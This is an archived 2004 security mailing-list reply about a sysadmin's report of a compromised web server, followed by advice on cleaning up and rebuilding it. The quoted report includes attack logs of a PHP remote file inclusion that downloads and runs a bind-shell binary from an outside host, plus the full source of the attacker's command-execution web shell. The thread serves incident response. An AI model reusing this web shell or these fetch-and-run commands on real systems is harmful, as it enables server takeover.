[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Re: Hack attempt

To: Norbert Crettol <norbert.crettol@idiap.ch>, focus-linux@securityfocus.com
Subject: Re: Hack attempt
From: security <security@kalamiteit.nl>
Date: Fri, 23 Jul 2004 14:40:33 +0200
Delivered-to: shane@homeo.stud.ntnu.no
Delivered-to: mailing list focus-linux@securityfocus.com
Delivered-to: moderator for focus-linux@securityfocus.com
In-reply-to: <20040721170230.3e78829b.norbert.crettol@idiap.ch>
List-help: <mailto:focus-linux-help@securityfocus.com>
List-id: <focus-linux.list-id.securityfocus.com>
List-post: <mailto:focus-linux@securityfocus.com>
List-subscribe: <mailto:focus-linux-subscribe@securityfocus.com>
List-unsubscribe: <mailto:focus-linux-unsubscribe@securityfocus.com>
Mailing-list: contact focus-linux-help@securityfocus.com; run by ezmlm
References: <20040721170230.3e78829b.norbert.crettol@idiap.ch>
User-agent: Mozilla Thunderbird 0.7.1 (X11/20040715)

Hi, well dear Norbert, is not some kind of attack .. it is simply a script kiddy, that managed to get that inject.txt( actually a php script ) on your server, and then simply began executing commands, on your server after getting a bindshell, from the name probably on port 8080, now, as the dude got an egg drop on there, he's probably some script kiddy, who uses your server for irc stuff (can be anything) waiting for his '31337' master to tell him to DoS someone, which is also possible. now there is not much to worry if you have not had more messages from tripwire telling you there are some binaries that has been changed, i guess that dude is too lame to even get root, and change binaries with backdoored ones, and then change the tripwire checksums database.

anyways .. just remove those files, try to find how he managed to get his php script on there, also try to look has a weak passwd and tell him/her to change it ! or even better .. just place all kind of monitoring tools, and look if he comes back, and try to see how bad it exactly is, in the meanwhile, i would start building a new server that is safer, and then migrate the client stuff from the compromised machine to the new server, and then audit the compromised machien

cheers, Amine

Norbert Crettol wrote:

Hi all.
This is my first post here. I'm Norbert Crettol, one of the sysadmins
of Idiap, a research center in Switzerland (www.idiap.ch).
We've had a undesired visitor, last night, that I discovered in the reports of tripwire.

Here are the logs we got (we get a remote copy of the web server logs in another host). As of the second line, I've stripped the head and the tail of the line which is allways the same. --- begin --- "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)" bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=/sbin/ifconfig%20-a bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/;ls%20-la bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;ls%20-la bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;wget%20bosscalvin.com/bind2080 bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;chmod%20755%20bind2080 bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=cd%20/var/lock/;./bind2080 --- end --- I've seen no other

It looks like bind8080 has created a directory /var/lock/.tmp and expanded an (owned by the web server owner) archive there. Here is the list of the files : 3225 jui 20 03:53 c-leet 15 jui 20 03:47 c-leet.dir 51 jui 20 03:47 cron.d 512 mai 12 2002 doc/ 14 jui 21 16:27 eggdrop -> eggdrop-1.6.10* 2523568 mai 12 2002 eggdrop-1.6.10* 512 mai 12 2002 filesys/ 343 fév 11 03:55 fuck* 512 mai 12 2002 help/ 21149 nov 4 2003 kik* 1024 jui 21 11:00 language/ 512 mai 12 2002 logs/ 6 jui 20 03:48 pid.CaEm- 23065 jan 29 15:00 proc* 6 jui 20 03:48 psybnc.pid 28591 mai 12 2002 README 89 jui 20 03:53 run* 588 avr 1 10:00 run-* 708 avr 1 10:00 run--* 512 mar 31 08:12 scripts/ 512 mai 12 2002 text/ 2523568 mar 28 01:41 vi* 30293 nov 17 2002 xhide* 182 jui 20 03:47 y2kupdate*
Here is the content of http://www.bosscalvin.com/inject.txt :
--- begin ---

 <center>
CMD - System Command </center></center> 
# CMD PHP : 
# Released by : SecurityCorp 
# Edited by CaEm
 
 
<hr color="red" width=751px height=115px>
 
<pre>
<?
 // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
 if (isset($chdir)) @chdir($chdir);
 ob_start();
 system("$cmd 1> /tmp/nobody 2>&1; cat /tmp/nobody; rm -rf /tmp/nobody");
 $output = ob_get_contents();
 ob_end_clean();
 if (!empty($output)) echo str_replace(">", "&gt;", str_replace("<", "&lt;", $output));
?>
</pre>
 
<hr color="red" width=751px height=115px>
 
« CaEm » @ îrç.Ðå£.ñët #Renjana 
--- end ---
Has someone seen this kind of attack ? (chkrootkit doesn't detect it). Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ? Is there a way to stop this guy ? His nickname (CaEm) appears in the the uploaded scripts.
Norbert

References:
- Hack attempt
 - From: Norbert Crettol <norbert.crettol@idiap.ch>

Prev by Date: Re: Hack attempt
Next by Date: Re: Hack attempt
Previous by thread: Re: Hack attempt
Next by thread: Re: Hack attempt
Index(es):
- Date
- Thread